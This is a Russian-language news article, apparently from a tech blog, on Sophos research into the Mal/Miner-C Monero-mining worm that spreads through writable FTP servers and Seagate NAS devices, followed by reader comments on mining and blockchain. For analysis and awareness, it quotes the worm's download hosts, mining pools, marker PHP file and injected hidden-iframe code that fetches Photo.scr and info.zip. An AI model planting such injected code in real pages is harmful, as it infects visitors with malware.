Рост сложности майнинга Bitcoin с июня 2013 года по сентябрь 2016 года, график CoinDesk
Казалось бы, злоумышленникам пора отказаться от зловредов с криптомайнерами и перейти на вымогатели (ransomware). Многие так и сделали. Но тут на сцену вышли новые криптовалюты — и старая бизнес-модель снова стала эффективной.
Специалисты из антивирусной компании Sophos Labs рассказывают о новом криптомайнере, который заражает подключенные к интернету сетевые накопители (NAS).
Зловред специализируется на майнинге относительно новой криптовалюты Monero (XMR). Это не единственная новая валюта с небольшой сложностью, но злоумышленники по каким-то причинам выбрали именно её.
Как видно на графике, сложность майнинга Monero оставалась довольно стабильной в течение долгого времени. Она резко увеличилась только в сентябре, после публикации отчёта Sophos об обнаруженном зловреде. О Monero узнало больше пользователей, так что её популярность несколько выросла (поправка: рост сложности и рост курса Monero могли быть вызваны другими причинами).
Но в то время, когда криптомайнер распространялся по сетевым накопителям Seagate, сложность майнинга оставалась примерно на одном уровне.
Рост сложности майнинга Monero с июня 2016 года по сентябрь 2016 года, график CoinWarz
Mal/Miner-C
Специалисты антивирусной компании говорят, что зловред Mal/Miner-C постоянно поддерживается и активен до сих пор. Его авторы стабильно выпускают новые версии, но все эти версии сделаны с использованием системы создания установочных программ Nullsoft Scriptable Install System (NSIS).
В установочном комплекте идёт несколько версий майнера для CPU и GPU, а также для 32-битных и 64-битных версий Windows.
Зловред проверяет версию системы — и добавляет соответствующий исполняемый файл в AutoRun.
Последние версии скрипта NSIS скачиваются со следующих хостов:
- stafftest.ru
- hrtests.ru
- profetest.ru
- testpsy.ru
- pstests.ru
- qptest.ru
- prtests.ru
- jobtests.ru
- iqtesti.ru
Среди прочего, в скачиваемом документе указан майнинг-пул, куда следует отправлять результаты работы.
stratum+tcp://mine.moneropool.com:3333
stratum+tcp://xmr.hashinvest.net:1111
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://mine.cryptoescrow.eu:3333
Известны и кошельки, на которые майнинг-пул перечисляет вознаграждение.
Этот криптотроян интересен тем, что он пытается распространяться как червь. Инфицировав одну систему, он пытается скопировать себя по FTP по случайно сгенерированным IP-адресам со стандартными именами пользователя и паролями. Попав на FTP-сервер, червь модифицирует файлы с расширением .htm и .php, вставляя фреймы, с которых предлагается загрузить файлы Photo.scr и info.zip. При открытии веб-страницы перед пользователем возникает диалог «Сохранить как...».
Заражение сетевых накопителей Seagate NAS
Во время поиска систем, инфицированных зловред Mal/Miner-C, исследователи обнаружили кое-что необычное. Они нашли, что многие системы были инфицированы файлом под названием w0000000t.php.
Файл содержит строчку
<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
При успешном заражении системы запрос к этому файлу возвращает ответ:
nopenopenope
Зная о скомпрометированном устройстве, позже туда устанавливался фрейм с Mal/Miner-C:
<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
<iframe src=ftp://ftp:shadow@196.xxx.xxx.76//info.zip width=1 height=1
frameborder=0>
</iframe>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
За первые полгода 2016 года антивирусной компании удалось выявить 1 702 476 заражённых устройств на 3150 IP-адресах.
Как выяснилось, среди различных сетевых хранилищ (NAS) наиболее пострадавшим оказался Seagate Central NAS.
В этом сетевом хранилище есть приватные (закрытые) и открытые папки. Что интересно, по умолчанию файлы записываются в открытую папку, и аккаунт невозможно удалить или деактивировать. С админского аккаунта можно активировать удалённый доступ к устройству, и тогда для удалённого доступа доступны все аккаунты, в том числе анонимный доступ. Этим и пользуются злоумышленники, чтобы записывать в сетевое хранилище свои файлы Photo.scr и info.zip.
Избавиться от такой угрозы можно, если отключить удалённый доступ к устройству, но тогда пользователь лишится возможности стриминга контента через интернет и других полезных функций сетевого хранилища.
Зная кошельки злоумышленников, специалисты антивирусной компании изучили историю транзакций.
Например, вот скриншот с суммой выплат на один из их кошельков: 4912,4 XMR.
По оценке Sophos, всего майнинг-пул выплатил ребятам (вероятно, из России) 58 577 XMR. На момент расчёта курс XMR к евро составлял 1,3 EUR за 1 XMR, то есть они заработали примерно 76 599 евро, и до сих пор зарабатывают около 428 евро в день. Неплохо для российских студентов, если стипендии не хватает на жизнь.
Криптовалюта Monero не особенно страдает от злоумышленников: инфицированные машины генерируют всего 2,5% общего хэшрейта.
Чтобы оценить распространённость зловреда, специалисты изучили состояние FTP-серверов в интернете. Так, поисковая система Census выдаёт 2 137 571 открытый FTP-сервер, из них 207 110 допускают анонимный удалённый доступ, а 7263 позволяют запись. Так вот, 5137 из этих 7263 серверов были заражены Mal/Miner-C, то есть около 70% всех доступных для записи FTP-серверов.
Если вы думаете, что вы со своим скромным сетевым накопителем неинтересны криминальному миру, то есть сильная причина подумать ещё раз.
Комментарии (42)
rPman
11.09.2016 16:08+2Этим и пользуются злоумышленники, чтобы записывать в сетевое хранилище свои файлы Photo.scr и info.zip
накопитель — средство доставки до windows-машины
yupic
11.09.2016 18:55Как видно на графике, сложность майнинга Monero оставалась довольно стабильной в течение долгого времени. Она резко увеличилась только в сентябре, после публикации отчёта Sophos об обнаруженном зловреде. О Monero узнало больше пользователей, так что её популярность несколько выросла.
Сложность увеличилась не после публикации отчёта Sophos, а после того, как о поддержке Монеро заявили два крупнейших чёрных рынка в результате чего курс вырос более чем в 4,5 раза, что привлекло майнеров.
По оценке Sophos, всего майнинг-пул выплатил ребятам (вероятно, из России) 58 577 XMR. На момент расчёта курс XMR к евро составлял 1,3 EUR за 1 XMR, то есть они заработали примерно 76 599 евро, и до сих пор зарабатывают около 428 евро в день. Неплохо для российских студентов, если стипендии не хватает на жизнь.
На текущий момент 58 577 XMR это около 691 000 долларов, то есть 617 150 евро.
Зная кошельки злоумышленников, специалисты антивирусной компании изучили историю транзакций.
Зная кошельки историю транзакций по блокчейну изучить нельзя, так как валюта анонимная и не видно куда идут деньги. Они лишь нашли несколько пулов, на которых идёт майнинг и посмотрели какие были выплаты с этих пулов.Delics
11.09.2016 21:01> а после того, как о поддержке Монеро заявили два крупнейших чёрных рынка
Всё же интересно, как авторы майнера так угадали с валютой? Их же сотни.
Совпадение удивительное.yupic
11.09.2016 21:22Они не угадали, а скорее всего выбирали валюту осознанно.
Во-первых, эта валюта может эффективно майниться на процессорах. Даже ASIC не даст большой хешрейт, а только уменьшит затраты энергии на вычисление одного хэша. Скорее всего это был один из критериев при выборе подходящей валюты.
Во-вторых, они итак неплохо зарабатывали, так как и до подорожания 1 XMR стоил около 2 долларов.
В-третьих, это хорошая технология, что многие признают: раз и два.yupic
11.09.2016 21:42+1Забыл самое главное. Вы пишете про сотни криптовалют. Но на самом деле, есть очень немного уникальных технологий, на базе которых создано много форков. Есть Bitcoin и сотни его форков, а есть CryptoNote валюты, одной из которых является Monero, кроме них ещё есть Etherium, Next и несколько других технологий.
Вот хороший сайт, где всё это отражено: http://mapofcoins.com/
isden
12.09.2016 09:14> Во-первых, эта валюта может эффективно майниться на процессорах.
Не очень эффективно. Я ради проверки завел CPU-майнер на стенде с 2-х ядерным core i5 — в итоге получил хэшрейт где-то в районе 10-13 H/s, с периодической просадкой до 6-8. Ихний калькулятор говорит, что с таким HR ловить особо нечего, нужно что-то в районе > 500...1000 H/s.
Тут все дело таки в масштабах.rPman
12.09.2016 09:45Видеокарты ATI дают примерно 200-300 хешей, мой AMD FX 61xx дает порядка 170 хешей. Что то вы не то делали, наверное.
Monero configurations — google docs
p.s. Майнинг альткоинов на обычных десктопных компьютерах, на текущий момент, выгодный но имеет малый выхлоп (видеокарта отбивается +- за 4-5 месяцев).
isden
12.09.2016 09:52+1> Что то вы не то делали, наверное.
может эффективно майниться на процессорах
ради проверки завел CPU-майнер
Мощных видеокарт поблизости нет, проверить GPU-майнер не могу.
yupic
12.09.2016 13:2010-13 хешей в секунду как-то мало. Вот смотрите даже Intel Core 2 Duo E6600 выдаёт 62 H/s, а различные Core i5 и того больше, и даже ARMv8-A выдаёт 22.5 H/s.
Когда раньше майнил на Core i7, то получал около 300 хэшей в секунду, сравните это с топовыми видеокартами (таблица по ссылке выше), которые максимум выдают 700 H/s. Вот это я и имел в виду: переход с процессора на видеокарту не дал прироста хэшрейта на порядки, и не сделал майнинг на процессоре бессмысленным.isden
12.09.2016 15:53Странно. Я брал офф.майнер с ихнего сайта. Как будет время — попробую еще третьесторонние.
yupic
12.09.2016 16:39Возьмите майнер с сайта любого пула, например, здесь. Можно брать либо CPUMiner, либо YAM Miner, насколько помню, раньше они выдавали примерно одинаковый хэшрейт. Про Claymore CPU Miner ничего сказать не могу, ни разу не запускал.
isden
12.09.2016 16:43Ага, я их и хотел попробовать.
А брал я вот отсюда — https://getmonero.org/knowledge-base/user-guides/vps_run_node, там через bitmonerod можно майнинг запускать + есть отдельный бинарник майнера.
V-core
11.09.2016 21:27Думаю дело в том что алгоритм Монеро дает анонимность. Так что авторов по указанному адресу не найдут.
Поэтому и дакрк веб её принял на вооружение.
Smitak
11.09.2016 20:52+1Я вот много раз искал, но так и ненашел нигде инфы: Зачем это вообще нужно? Какова цель всей это индустрии в обработке огромного объёма информации? Что это за хэши? Ключи от ядерных ракет или какие-то научные вычисления? То есть огромное количество ресурсов тратиться на вычисление чего в итоге? Просто пустые условные биты? Какая-то нелепая система выходит, хотя и рабочая. Но я надеюсь что хотябы польза какая-то от этого всего имеется?
Labunsky
11.09.2016 21:05-1Хеши составляют блоки в блокчейне, а считать их надо потому, что обратной функции нет.
На самом деле, смысла расписывать в комментариях это нету, даже русская википедия хранит вполне понятное разъяснение: ru.wikipedia.org/wiki/Цепочка_блоков_транзакцийSmitak
12.09.2016 01:39+2Кароче я понял, что не вычисляется ничего полезного или прикладного. По-сути система постороена на пустых, безсмысленных вычислениях. Трата электроэнергии и мощностей впустую.
simki28781
12.09.2016 02:07Трата мощностей колоссальная, где-то даже упоминалось о точном количестве тонн СО2 из-за работы сети биткойнов. Но за всё надо платить.
Полезные вычисления есть тут, впрочем если поставить вопрос о соотношении цена/качество, тоже под вопросом:
https://habrahabr.ru/company/intel/blog/165585/a5b
13.09.2016 03:58https://geektimes.ru/post/245936/ Сколько углекислого газа «генерируют» биткоины — Alizar, 16 февраля 2015
и уточнения https://geektimes.ru/post/245936/#comment_8364378
средняя электрическая мощность сети = 340 МВт… Расход энергии в кВтч:… за 10 минутный интервал… 56 700 кВтч; Выбросы CO2 за 10 минут:… 28 350 кг; Выбросы CO2 на 1 созданный биткоин: 28 350 / 25 = 1134 кг… 8 160 000 кВт*ч каждый день
Т.е. почти вся выручка майнеров сейчас уходит энергетическим компаниям.
xMushroom
12.09.2016 08:36+2Ну печать денег — тоже вещь совершенно бесполезная, только бумагу и краску переводит, сами по себе эти бумажки никакого прикладного применения не имеют. Накладные расходы, что поделать…
RafaelRS
12.09.2016 03:14А смысл в этом такой:
Обычные бумажные деньги просто печатают, это легко и просто и дешево, казалось бы можно запросто увеличить количество денег в стране и все станут богатыми. Но это не так, т.к. товара то в стране не увеличится, страна останется такой же бедной. Потому, грамотное финансовое руководство печатает денег соразмерно размеру товарооборота в стране.
Задумка же вышеупомянутых валют в том, что там нет центрального органа, который печатает деньги и решает, когда целесообразно это делать. Вместо этого деньги печатают все кому не лень. Но ведь как я уже сказал, от бесконтрольного печатания денег толку никакого. Поэтому, вместо здравого смысла и анализа экономической целесообразности, ограничением излишнего печатания денег здесь является искусственно организованное препятствие. Суть этого препятствия в том, что чтобы напечатать валюту ты должен напрячь вычислительные мощности своего компа. И чем больше этой валюты, тем сложнее ее печатать. Экономически конечно это неправильно, но вот так устроенная система. Есть ли от этого реальная польза — сложно сказать, посмотрим, пока выглядит как неординарный проект. Хотя для темных делишек уже играет пользу.rPman
12.09.2016 09:50У вас ошибка в рассуждениях, фатальная, — количество монет никак не зависит от мощности сети (на самом деле зависимость есть, слабая, на грани 10%, потому как пересчет мощности у bitcoin и многих других альткоинов идет с задержкой, кстати популярные альткоины же давно пересчитывают сложность в реальном времени, т.е. там количество монет точно никак не зависит от мощности)
Survtur
12.09.2016 10:51Верно. И как раз этот важный момент делает биткойн очень ценным в том плане, что государство не может печатать деньги когда захочет. В ведь именно печать денег делает всех беднее и порождает инфляцию.
RafaelRS
13.09.2016 08:54Какая такая фатальная? Я не говорил, что содержание количества монет требует мощности. Я сказал «печать» новых монет требует мощности. И ростом количества монет ее требуется все больше и больше (ака рост сложности).
pash7ka
12.09.2016 10:24Если очень грубо и кратко, то хэш-функция — это такой способ преобразовать кусок данных в число. Ну то есть, например, 10 килобайт каких-то данных можно преобразовать в 256-битное число — хэш. И 100 килобайт — в другое 256-битное число. И вообще какие угодно данные. И с определённой, очень высокой долей вероятности эти числа будут разными, если исходные данные разные. (И, разумеется, одинаковыми, если данные одинаковые.) А обратно преобразовать число в исходные данные невозможно.
Теперь про криптовалюты. Блокчейн можно представить как эдакую большую бухгалтерская книга, содержащая историю переводов денег из одного кошелька в другой. А записи в ней делает не какой-то один бухгалтер, а (почти) любой желающий. Но по определённым правилам.
Вся «книга» состоит из отдельных листов — блоков (блокчейн = цепочка блоков). Каждый лист включает в себя:
— ссылку на предыдущий лист;
— список переводов (транзакций);
— хэш блока.
С первым пунктом — ссылкой на предыдущий — всё, наверное, понятно: по такой цепочке можно прочитать всю книгу раскручивая её назад. Список транзакций — тоже просто: владелец кошелька, желающий передать кому-то деньги, просто публикует перевод, подписывая его своим ключом. И часть (или все) такие переводы, которые валидны (т.е. подпись верна, в кошельке достаточно средств, ранее перевод не был исполнен, и т.д.) можно включить в свой блок.
Тут следует заметить, что мотиватором создавать блоки является во первых — комиссия за перевод (назначается отправителем по собственному желанию), а во вторых — некий «бонус» за создание блока.
Ну и третий пункт списка: хэш блока — это самое интересное. С одной стороны, мы хотим чтобы писать в нашу книгу (т.е. создавать блоки) мог любой желающий. Но c другой, если мы просто так позволим первому встречному это делать — то с учётом того, что мы за это платим, получится полная вакханалия и бардак. Решение которое было предложено создателем биткоина: желающий создать блок должен доказать, что проделал некую работу.
В случае Биткоина — работу ни капельки не полезную, зато весьма время-затратную: надо составить такой блок, чтобы его хэш был меньше некоторой величины. Другими словами — чтобы некоторое количество первых бит полученного хэша были нулями. Сколько именно бит должны быть нулевыми — это как раз то, что определяет сложность проделанной работы: чем их больше, тем сложнее найти подходящий блок. То есть работа состоит буквально в случайном переборе вариантов блоков (там, в структуре блока, есть специально для этого число, которое можно менять, либо можно менять входящие в блок транзакции), до тех пор, пока не будет найден подходящий.rPman
12.09.2016 13:02добавлю, что доказательство работы на основе вычислений зовется proof of work (вообще то это дословный перевод доказательство работы но на практике используется только если эта работа — вычисления), есть еще технологии на основе, буквально, наличия места на диске (proof of capacity) и самое интересное — времени и количестве удержания без движении монет в кошельке — proof of stake. По отдельности у них есть свои недостатки, поэтому существуют гибридные технологии, когда в одного пределах блокчейна используют например PoW и PoS, таким образом заметно усложняя жизнь злоумышленникам, желающим нарушить работу сети методом 'грубой силы' (имеющим большие мощности или в наличии большое количество монет).
jabr
12.09.2016 06:20+1Имею опыт использования домашнего NAS от WesternDigital и от Seagate.
При настройке домашнего NAS от Seagate:
Без создания админской учетки прав на запись даже в общую папку у вас нет. Админская учетка создается только через online регистрацию в сервисе Seagate, в котором вы указываете свой email, т.е. у Seagate есть ваш пароль на ваш NAS. Информация о защищенности аккаунта в таком сервисе отсутствует; кроме того, email может быть слит в результате компроментации иных сервисов, где он был указан (а может и вдобавок и пароль, если он один и тот же).
У WesternDigital вы создаете админскую учетку на самом устройстве. Потом (если захотите), можете подключить к Web2Go. Кроме того, если кому надо больше фич — в качестве OS — Debian.
dmitryi_k
12.09.2016 14:22+1Нашел у себя на NAS`е в корне файлы Photo.scr и info.zip
Можете подсказать где еще покопаться чтоб удалить эту заразу? и есть ли способ защиты без отключения удаленного доступа? До обновления прошивки можно было получить рут права, и переконфигурировать ftp удалил анонимного пользователя, сейчас тоже возможно через дыру в безопасности (PHP скрипты выполняются от имени root пользователя), но как то тяжело мне это дается.
AntonSor
Поразительно. Казалось бы, какой там стоит процессор. И на нем, значит, тоже можно майнить!
sumanai
Ага, имея больше полутора миллионов процессоров.
slonopotamus
ЯННП.
Так сколько устройств заражено-то?
yupic
Майнить можно даже на JavaScript: https://minergate.com/web-miner
robert_ayrapetyan
А как же легион asic-proof криптовалют?
yupic
И можно даже на смартфоне майнить: https://play.google.com/store/apps/details?id=com.minergate.miner
igolikov
NAS не используется для майнинга, они используется только для распространения червя